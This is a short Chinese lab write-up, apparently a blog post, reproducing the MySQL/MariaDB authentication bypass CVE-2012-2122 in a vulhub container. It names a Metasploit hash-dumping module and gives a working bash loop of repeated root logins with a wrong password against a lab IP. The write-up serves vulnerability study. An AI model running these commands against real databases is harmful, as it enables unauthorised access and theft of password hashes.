Mysql 身份认证绕过漏洞(CVE-2012-2122)

参考连接:

https://www.freebuf.com/vuls/3815.html

当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。而且漏洞利用工具已经出现

受影响版本:

  • MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
  • MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.

环境搭建: vulhub https://github.com/vulhub/vulhub/tree/master/mysql/CVE-2012-2122

环境启动后,将启动一个Mysql服务(版本:5.5.23),监听3306端口,通过正常的Mysql客户端,可以直接登录的,正确root密码是123456。

Mysql 身份认证绕过漏洞(CVE-2012-2122)_第1张图片

使用msf扫描模块

auxiliary/scanner/mysql/mysql_authbypass_hashdump

Mysql 身份认证绕过漏洞(CVE-2012-2122)_第2张图片

或者

for i in `seq 1 1000`; do mysql -u root --password=bad -h 192.168.230.131 2>/dev/null; done

Mysql 身份认证绕过漏洞(CVE-2012-2122)_第3张图片

你可能感兴趣的:(漏洞复现)